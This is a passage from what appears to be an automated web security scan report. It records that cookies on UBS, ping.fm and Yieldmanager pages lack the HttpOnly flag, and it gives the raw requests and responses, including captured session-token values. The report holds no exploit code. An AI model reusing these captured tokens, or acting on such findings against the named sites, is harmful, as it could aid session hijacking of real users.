<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>K
...[SNIP]...

10.14. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /awu/help/inter/en/ubsHelp.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /awu/help/inter/en/ubsHelp.htm HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:24 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1958
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_L9gle69HertpY5M1FA0n6S8Ha8hmI3x+G1EGHTEEbrittFE1; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/awu/help/inter/en/ubs
...[SNIP]...

10.15. https://nae.ubs.com/quotes

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /quotes

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:21 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1935
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_QnzyiVMmCmOuQc59lEBC6wIYAyv-NToCOLr+gbDJuPrkFe1I; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes">
</head>
<bod
...[SNIP]...

10.16. https://nae.ubs.com/quotes/markets_instruments

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /quotes/markets_instruments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes/markets_instruments HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:19 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1955
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_SX4z2ua6xceeMCGR3a5iZThqKGwm33qPdj7u-pf6nRdVUcxu; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instru
...[SNIP]...

10.17. http://ping.fm/ref/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ping.fm
Path:   /ref/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/ HTTP/1.1
Host: ping.fm
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Wed, 06 Jul 2011 11:21:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3p28cc2ebck30pasml0mp53is1; path=/
Content-Length: 0
Connection: close
Via: 1.1 AN-0016020121270012


10.18. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1183778&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!
(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w